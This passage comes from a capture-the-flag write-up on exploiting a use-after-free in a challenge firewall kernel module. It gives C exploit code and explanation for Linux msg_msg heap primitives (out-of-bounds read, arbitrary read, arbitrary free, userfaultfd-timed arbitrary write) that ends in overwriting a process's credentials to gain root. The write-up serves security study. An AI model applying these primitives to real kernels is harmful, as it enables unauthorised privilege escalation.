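/* Payload split performed by msgsnd() (4K-page x86_64 constants):
 * the msg_msg chunk holds a 0x30-byte header plus up to DATALEN_MSG
 * bytes of data; each msg_msgseg holds an 8-byte next pointer plus
 * up to DATALEN_SEG bytes of data. */
#define DATALEN_MSG (0x1000 - 0x30) /* 0xfd0 */
#define DATALEN_SEG (0x1000 - 0x08) /* 0xff8 */

/* number of trailing segments needed for a payload of len bytes */
static inline size_t segments_for(size_t len)
{
    if (len <= DATALEN_MSG)
        return 0;
    return (len - DATALEN_MSG + DATALEN_SEG - 1) / DATALEN_SEG;
}
```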

Once the procedure is completed, as we can see in the do_msgrcv() source code, it calls free_msg() [3] to deallocate the message and its respective segment:

void free_msg(struct msg_msg *msg)
{
    struct msg_msgseg *seg;

    security_msg_msg_free(msg);

    seg = msg->next;
    kfree(msg);  // [3.1]
    while (seg != NULL) { // [3.2]
        struct msg_msgseg *tmp = seg->next;

        cond_resched();
        kfree(seg); // [3.3]
        seg = tmp;
    }
}

Initially free_msg() uses kfree() to free the message [3.1], then it starts traversing the singly linked list of segments [3.2] to deallocate them [3.3].

Now it is important to note that if we call msgrcv() with the MSG_COPY flag, for example as follows:

void *memdump = malloc(0x1fc8);
msgrcv(qid, memdump, 0x1fc8, 1, IPC_NOWAIT | MSG_COPY | MSG_NOERROR);

the kernel will not destroy the original message.

From the do_msgrcv() source code, we can see that if MSG_COPY is set, the kernel uses prepare_copy() to allocate a temporary message [4], then calls copy_msg() to copy the content of the requested message into it (using memcpy()). This way, after the message is copied to user space, the original is preserved and only the copy is destroyed by free_msg(). This will be extremely important in the exploitation phase.

It is possible to use the MSG_COPY flag only if the kernel is compiled with CONFIG_CHECKPOINT_RESTORE. This is true by default in many Linux distributions.

The Exploit: Out Of Bounds Read

At this point, after analyzing the code used by the kernel to perform message operations, it is quite clear how the corruption of message metadata can be used to compromise the kernel.

In the next sections, by corrupting fields of the msg_msg structure, we will be able to find the address of the current task in memory and overwrite its credentials with zeroes to get root privileges.

How to get arbitrary read by corrupting the m_ts field and the next field of the msg_msg structure has already been shown by the Linux kernel developer and security researcher Alexander Popov in his excellent article Four Bytes of Power: Exploiting CVE-2021-26708 in the Linux kernel.

After reading his article, I wondered what other primitives this elastic object could offer, and after analyzing the source code, I managed to turn it into an exploitation toolkit.

Since the firewall does not offer any function we can exploit to get a leak (remember, show_rule() is exposed but not implemented), we cause a UAF by duplicating a rule and then freeing it. Next we allocate messages (because of the SLUB allocator's LIFO behavior, the freed rule chunk will be reused by one of them), and finally we corrupt the message's m_ts field using edit_rule() to get an Out Of Bounds Read primitive when msgrcv() is called:

[...]

void send_msg(int qid, int size, int c)
{
    struct msgbuf
    {
        long mtype;
        char mtext[size - 0x30];
    } msg;

    msg.mtype = 1;
    memset(msg.mtext, c, sizeof(msg.mtext));

    if (msgsnd(qid, &msg, sizeof(msg.mtext), 0) == -1)
    {
        perror("msgsnd");
        exit(1);
    }
}

[...]

// [1]
if ((qid[0] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)
{
    perror("msgget");
    exit(1);
}

if ((qid[1] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)
{
    perror("msgget");
    exit(1);
}

// [2]
add_rule(0, buff, INBOUND);
duplicate_rule(0, INBOUND);
delete_rule(0, INBOUND);

send_msg(qid[0], 0x40, 'A'); // [3]
send_msg(qid[1], 0x40, 'B'); // [4]
send_msg(qid[1], 0x1ff8, 0); // [5]

[...]

First, we create two queues using msgget() [1]. Let’s identify the first queue with QID #0 and the second one with QID #1.

Then we cause a UAF by adding a rule to firewall_rules_in, duplicating it into firewall_rules_out, and freeing it from firewall_rules_in [2]. Despite the pointer being set to NULL in firewall_rules_in, the chunk will still be accessible through firewall_rules_out.

Now we can use send_msg() (a msgsnd() wrapper) to allocate three messages. We allocate a first message of 0x40 bytes (0x30 bytes of header and 0x10 bytes of data) in the first queue, QID #0 [3]. Since we just freed the rule, the message will be allocated at the same address, giving us full control over the message header.

PS: It is important to note that this system is virtually noise-free. On a real system, we would need to saturate partial slabs before allocating the firewall rule and instead of allocating three messages, we would need to spray many of them.

Now we allocate two more messages in QID #1: a first message of 0x40 bytes (again, 0x30 bytes of header and 0x10 bytes of data) [4], which also lands in kmalloc-64, and a second one of 0x1ff8 bytes (0x30 bytes of header and 0x1fc8 bytes of data) [5].

At this point the situation in memory should be similar to the following diagram. Please note that because of freelist randomization, the first message may be allocated after the second one and our leak attempt may fail. In this case we simply need to delete the second queue and run the exploit again.

[diagram]

In the diagram above, in orange, we can see the message header of the first message in QID #0. We have full control over this object using edit_rule().

Still in kmalloc-64, we can also see the other message, belonging to QID #1. Its m_list.prev field points to its message queue, QID #1, while its m_list.next field points to the second message in QID #1: the large message in kmalloc-4k.

This message has a pointer to a segment, also in kmalloc-4k. We are ready to get an information leak by triggering an Out Of Bounds Read:

[...]

void *recv_msg(int qid, size_t size)
{
    void *memdump = malloc(size);

    if (msgrcv(qid, memdump, size, 0, IPC_NOWAIT | MSG_COPY | MSG_NOERROR) == -1)
    {
        perror("msgrcv");
        return NULL;
    }

    return memdump;
}

[...]

uint64_t *arb_read(int idx, uint64_t target, size_t size, int overwrite)
{
    struct evil_msg *msg = (struct evil_msg *)malloc(0x100);

    msg->m_type =  0;
    msg->m_ts = size; // [2]

    if (overwrite)
    {
        msg->next = target;
        edit_rule(idx, (unsigned char *)msg, OUTBOUND, 0);
    }
    else
    {
        edit_rule(idx, (unsigned char *)msg, OUTBOUND, 1); // [3]
    }

    free(msg);

    return recv_msg(qid[0], size); // [4]
}

[...]

uint64_t *leak = arb_read(0, 0, 0x2000, 0); // [1]

[...]

Using arb_read() [1] with a size argument of 0x2000 bytes, we overwrite the target object's m_ts field [2] using edit_rule() [3].

Then, calling recv_msg() (a msgrcv() wrapper) [4], we get an information leak. It is important to note that recv_msg() uses the MSG_COPY flag: by overwriting the target object we corrupted its m_list.next and m_list.prev fields, so without MSG_COPY, do_msgrcv() would try to unlink the message from the queue and crash.
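arb_read() above fills a struct evil_msg whose definition is not shown in the excerpt; a user-space mirror of the kernel's struct msg_msg consistent with the field accesses would look like this (name and layout inferred, 0x30 bytes on x86_64):

```c
#include <stdint.h>

/* User-space mirror of the kernel's struct msg_msg header. The name
 * evil_msg and the exact field names are assumptions matching the
 * exploit snippets, not the kernel's own definition. */
struct evil_msg {
    struct {
        uint64_t next;      /* struct list_head m_list */
        uint64_t prev;
    } m_list;
    uint64_t m_type;        /* message type */
    uint64_t m_ts;          /* data length: the OOB read knob */
    uint64_t next;          /* msg_msgseg pointer: the arbitrary read knob */
    uint64_t security;      /* LSM blob pointer */
    char data[];            /* payload starts at offset 0x30 */
};
```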

[diagram]

As we can see from the figure above, we have overwritten the m_ts field of the msg_msg in QID #0, which gives us an Out Of Bounds Read primitive when recv_msg() is called. This way, we can leak the m_list.next field of the message in QID #1 (the address of the large message in kmalloc-4k), its m_list.prev field (the pointer to QID #1), and sysfs_bin_kfops_ro.

PS: sysfs_bin_kfops_ro comes from mounting /sys in the init file. The symbol is there because the system is virtually noise-free: no other objects have been allocated since system startup. On a real system we would need to spray target objects in the slab before attempting to leak. For example, we could spray pipe_buffer structures and then resize pipe rings to allocate them in kmalloc-64.
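For illustration, such a pipe_buffer spray could be sketched as follows (not part of the challenge exploit): shrinking a pipe ring to one page leaves a single 40-byte pipe_buffer slot, which the allocator serves from kmalloc-64.

```c
#define _GNU_SOURCE /* for F_SETPIPE_SZ */
#include <fcntl.h>
#include <unistd.h>

/* Spray pipe_buffer arrays into kmalloc-64: each pipe resized to one
 * page keeps a single 40-byte pipe_buffer slot, so the slot array is
 * allocated from kmalloc-64. Returns 0 on success, -1 on failure. */
int spray_pipe_buffers(int pipes[][2], int n)
{
    for (int i = 0; i < n; i++) {
        if (pipe(pipes[i]) < 0)
            return -1;
        if (fcntl(pipes[i][0], F_SETPIPE_SZ, 0x1000) < 0)
            return -1;
    }
    return 0;
}
```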

sysfs_bin_kfops_ro belongs to the kernel data section and is not affected by FGKASLR, so we can use it to calculate the kernel base address, as well as the addresses of other symbols in the data section.
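The rebasing itself is simple pointer arithmetic. As a sketch (the offset below is a hypothetical placeholder, not the challenge kernel's real value; you would read it from the target build's System.map or /proc/kallsyms):

```c
#include <stdint.h>

/* Rebase from the leaked data-section symbol. The offset is whatever
 * the target build reports for sysfs_bin_kfops_ro; 0xe4d0c0 here is a
 * made-up placeholder. */
#define SYSFS_BIN_KFOPS_RO_OFFSET 0xe4d0c0UL /* hypothetical */

static inline uint64_t kernel_base(uint64_t leaked_sysfs_bin_kfops_ro)
{
    return leaked_sysfs_bin_kfops_ro - SYSFS_BIN_KFOPS_RO_OFFSET;
}
```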

The Exploit: From Out Of Bounds Read To Arbitrary Read

In the previous section, among other things, we leaked the address of sysfs_bin_kfops_ro. We can use it to calculate the address of init_task, the task_struct of the first task in the system. In Linux, every task is described by a task_struct, and tasks are linked together in a circular doubly linked list, tasks.

In our discussion we are interested in three fields of task_struct: tasks, the circular doubly linked list of tasks (for each task it holds pointers to the next and previous tasks); pid, the process identifier; and cred, a structure that contains the process credentials (uid, gid, etc.).

[...]

uint64_t find_current_task(uint64_t init_task)
{
    pid_t pid, next_task_pid;
    uint64_t next_task;

    pid = getpid();

    printf("[+] Current task PID: %d\n", pid);
    puts("[*] Traversing tasks...");

    leak = arb_read(0, init_task + 8, 0x1500, 1) + 0x1f9;
    next_task = leak[0x298/8] - 0x298;

    leak = arb_read(0, next_task + 8, 0x1500, 1) + 0x1f9;
    next_task_pid = leak[0x398/8];

    while (next_task_pid != pid) // [2]
    {
        next_task = leak[0x298/8] - 0x298; // [3]
        leak = arb_read(0, next_task + 8, 0x2000, 1) + 0x1f9;
        next_task_pid = leak[0x398/8]; // [4]
    }

    puts("[+] Current task found!");

    return next_task;
}

[...]

puts("[*] Locating current task address...");
uint64_t current_task = find_current_task(init_task); // [1]
printf("[+] Leaked current task address: 0x%lx\n", current_task);

[...]

In the source code above, we use find_current_task() [1] to traverse all tasks, starting from init_task, until the current task is found [2].

find_current_task() calls arb_read() multiple times, each time overwriting the m_ts field and the next pointer of the target msg_msg object.

For each task it leaks the pointer to the next task [3] and the task's PID [4], then compares the leaked PID with the current process PID, until there is a match:
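The `- 0x298` in the code above is just container_of() done by hand: tasks.next points at the tasks member of the next task_struct, so subtracting the member offset recovers the structure's base. The offset is build-specific; 0x298 matches the challenge kernel.

```c
#include <stdint.h>

/* container_of() by hand: a task_struct's tasks.next points at the
 * tasks member of the next task, so subtracting the member offset
 * yields the task_struct base. 0x298 is the challenge kernel's
 * offset; check yours with pahole or gdb. */
#define TASKS_OFFSET 0x298UL

static inline uint64_t task_from_tasks_ptr(uint64_t tasks_next)
{
    return tasks_next - TASKS_OFFSET;
}
```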

[diagram]

In the figure above we can see that the m_ts field of the target object is now set to 0x2000 and its segment pointer points to init_task.

Now, calling msgrcv(), the kernel will not only copy 0xfd0 bytes from the message, but also 0xff8 bytes from the fake segment: init_task.

Once we have found the current task, we can use our arbitrary read primitive to leak the address of its cred structure.

[...]

leak = arb_read(0, current_task, 0x2000, 1) + 0x1fa;
cred_struct = leak[0x540/8];
printf("[+] Leaked current task cred struct: 0x%lx\n", cred_struct);

[...]

[diagram]

The Exploit: Arbitrary Free

At this point, we know the address of the current task and of its cred structure. Now we need to obtain arbitrary write, but it is not so simple: first we need an arbitrary free primitive.

An arbitrary free can be obtained by calling msgrcv() (without the MSG_COPY flag) two times:

[...]

msgrcv(qid[1], memdump, 0x1ff8, 1, IPC_NOWAIT | MSG_NOERROR); // [1]
msgrcv(qid[1], memdump, 0x1ff8, 1, IPC_NOWAIT | MSG_NOERROR); // [2]

[...]

The first time we call msgrcv() [1], the kernel will free the first message (in kmalloc-64) belonging to QID #1. When we call it again [2], the kernel will free the second message (in kmalloc-4k) and its respective segment (also in kmalloc-4k), both belonging to QID #1. The result in memory will be the following:

[diagram]

Now, this is a very important step, and can be quite confusing.

In the first part of the exploit, we leaked the address of the message in kmalloc-4k. In the previous step, when we used msgrcv() for the second time, the kernel, in free_msg(), released the message in kmalloc-4k first and then released its segment.

Because of the freelist's LIFO behavior, when we allocate a new message and corresponding segment in kmalloc-4k, the new message will be allocated at the address of the old segment, and the new segment at the address of the old message.

In other words, when we free and re-allocate message and segment, positions are swapped. Since we previously leaked the address of the message, what we know after re-allocation is the address of the new segment.

Here is a visual representation. We know the address of the green chunk:

[diagram]

Now that we have clarified this important point, we can use pthread to allocate a new message and its respective segment in kmalloc-4k:

[...]

void *allocate_msg1(void *_)
{
    printf("[Thread 1] Message buffer allocated at 0x%lx\n", page_1 + PAGE_SIZE - 0x10);

    if ((qid[2] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1) // [2]
    {
        perror("msgget");
        exit(1);
    }

    memset(page_1, 0, PAGE_SIZE);
    ((unsigned long *)(page_1))[0xff0 / 8] = 1;

    if (msgsnd(qid[2], page_1 + PAGE_SIZE - 0x10, 0x1ff8 - 0x30, 0) < 0) // [3]
    {
        puts("msgsend failed!");
        perror("msgsnd");
        exit(1);
    }

    puts("[Thread 1] Message sent, *next overwritten!");
}

[...]

pthread_create(&tid[2], NULL, allocate_msg1, NULL); // [1]

[...]

We create a new thread that will execute allocate_msg1() [1]. Here, we create a new queue [2], QID #2, then we use msgsnd() [3] to create a message of 0x1ff8 bytes (0x30 bytes of header and 0x1fc8 bytes of data). In kernel space this results in a 0x1000-byte message (0x30 bytes of header and 0xfd0 bytes of data), allocated in kmalloc-4k, plus a 0x1000-byte segment (0x8 bytes for the next pointer and 0xff8 bytes of data), also allocated in kmalloc-4k.

The location page_1 + PAGE_SIZE - 0x10 is not accidental: we use userfaultfd to monitor page_1 + PAGE_SIZE, waiting for a page fault.

When load_msg() tries to copy our message to kernel space, it will hit the monitored page and fault. At that point we can suspend the kernel thread in the middle of the copy_from_user() operation.

This will result in the following situation in memory:

[diagram]

We can finally use the arbitrary free primitive:

[...]

void arb_free(int idx, uint64_t target)
{
    struct evil_msg *msg = (struct evil_msg *)malloc(0x100);
    void *memdump = malloc(0x2000);

    msg->m_list.next = queue; // [2]
    msg->m_list.prev = queue;
    msg->m_type =  1;
    msg->m_ts = 0x10;
    msg->next = target; // [3]

    edit_rule(idx, (unsigned char *)msg, OUTBOUND, 0); // [4]

    puts("[*] Triggering arb free...");
    msgrcv(qid[0], memdump, 0x10, 1, IPC_NOWAIT | MSG_NOERROR); // [5]
    puts("[+] Target freed!");

    free(memdump);
    free(msg);
}

[...]

arb_free(0, large_msg); // [1]

[...]

The function arb_free() [1] is used to free the new segment.

We use the message queue pointer leaked in the first part of the exploit to fix m_list.next and m_list.prev [2]. This allows us to call msgrcv() without the MSG_COPY flag, and the kernel will not crash during the unlinking procedure.

We also set the message next pointer to the target address [3]: the new segment in kmalloc-4k.

When we overwrite the message [4] the situation in memory will be the following:

[diagram]

Now we can finally use msgrcv() [5] to free the message in QID #0 and the new segment:

[diagram]

The Exploit: From Arbitrary Free To Arbitrary Write

Now the next pointer of our message in kmalloc-4k points to a free object. We can create a new thread and allocate another message at that location:

[...]

void *allocate_msg2(void *_)
{
    printf("[Thread 2] Message buffer allocated at 0x%lx\n", page_2 + PAGE_SIZE - 0x10);

    if ((qid[3] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1) // [2]
    {
        perror("msgget");
        exit(1);
    }

    memset(page_2, 0, PAGE_SIZE);
    ((unsigned long *)(page_2))[0xff0 / 8] = 1;

    if (msgsnd(qid[3], page_2 + PAGE_SIZE - 0x10, 0x1028 - 0x30, 0) < 0) // [3]
    {
        puts("msgsend failed!");
        perror("msgsnd");
        exit(1);
    }

    puts("[Thread 2] Message sent, target overwritten!");
}

[...]

pthread_create(&tid[3], NULL, allocate_msg2, NULL); // [1]

[...]

We create a new thread [1], then in allocate_msg2() we create another queue, QID #3 [2], and use msgsnd() to allocate a 0x1028-byte message [3] (0x30 bytes of header and 0xff8 bytes of data).

In kernel space this message will result in a 0x1000-byte message (0x30 bytes of header and 0xfd0 bytes of data), allocated at the same address as the segment we previously freed with the arbitrary free primitive, plus a 0x30-byte segment (0x8 bytes for the next pointer and 0x28 bytes of data) allocated in kmalloc-64.

This time, our buffer is located at page_2 + PAGE_SIZE - 0x10 because we are monitoring page_2 + PAGE_SIZE with another userfaultfd thread, waiting for a page fault.

load_msg() will hit the monitored page, causing the following situation in memory:

[diagram]

We can finally release the first faulting thread. This lets us overwrite the next pointer of the message we have just allocated in kmalloc-4k with the address of the current task's cred structure minus 0x8 bytes:

[...]

    if (page_fault_location == page_1 + PAGE_SIZE)
    {
        printf("[PFH 1] Page fault at 0x%lx\n", page_fault_location);
        memset(buff, 0, PAGE_SIZE);

        puts("[PFH 1] Releasing faulting thread");

        struct evil_msg *msg = (struct evil_msg *)(buff + 0x1000 - 0x40);

        msg->m_type =  0x1;
        msg->m_ts = 0x1000;
        msg->next = (uint64_t)(cred_struct - 0x8); // [1]

        ufd_copy.dst = (unsigned long)(page_fault_location);
        ufd_copy.src = (unsigned long)(&buff);
        ufd_copy.len = PAGE_SIZE;
        ufd_copy.mode = 0;
        ufd_copy.copy = 0;

        for (;;)
        {
            if (release_pfh_1)
            {
                if (ioctl(ufd, UFFDIO_COPY, &ufd_copy) < 0)
                {
                    perror("ioctl(UFFDIO_COPY)");
                    exit(1);
                }

                puts("[PFH 1] Faulting thread released");
                break;
            }
        }
    }

[...]

We are subtracting 8 bytes [1] because we need the first QWORD of the fake segment to be NULL; otherwise the kernel will try to follow it as a pointer to the next segment, causing a crash.
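In other words, the fake segment header is placed so that its next pointer sits just below the cred structure while the segment data lands exactly on top of it. As simple arithmetic:

```c
#include <stdint.h>

/* struct msg_msgseg is { next pointer (8 bytes); data... }. Pointing
 * the fake segment at cred - 8 puts seg->next just below the cred
 * struct (it must read as NULL so the segment walk stops) and the
 * segment data exactly on top of the credentials. */
static inline uint64_t fake_seg_addr(uint64_t cred)
{
    return cred - 0x8;
}

static inline uint64_t fake_seg_data(uint64_t cred)
{
    return fake_seg_addr(cred) + 0x8; /* == cred */
}
```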

Once the first faulting thread is released, this is how the memory will look:

[diagram]

The next pointer of the message in QID #3 now points to the current task's credentials. The last step is predictable: we release the second faulting thread, overwriting the credentials with zeroes. This gives us root privileges:

[diagram]

Here is the exploit in action:

[demo]

The complete exploit can be found here: exploit.c

Conclusion

The technique described in the previous sections is applicable to multiple caches, from kmalloc-64 up to kmalloc-4k. In the specific case of kmalloc-4k, exploitation turns out to be simpler; to learn more, I recommend reading FizzBuzz101's excellent writeup of Fire of Salvation.

It is worth noting that in a less protected environment, such as a common Linux distribution (with CONFIG_STATIC_USERMODEHELPER unset, without FGKASLR, and so on), the technique can be simplified by targeting modprobe_path, core_pattern, etc., instead of the current task's credentials.

As always, for any question or clarification feel free to contact me (check About).

Challenges links: Fire of Salvation / Wall of Perdition

References

SMAP / SMEP

FGKASLR

NetFilter

CVE-2021-26708 by a13xp0p0v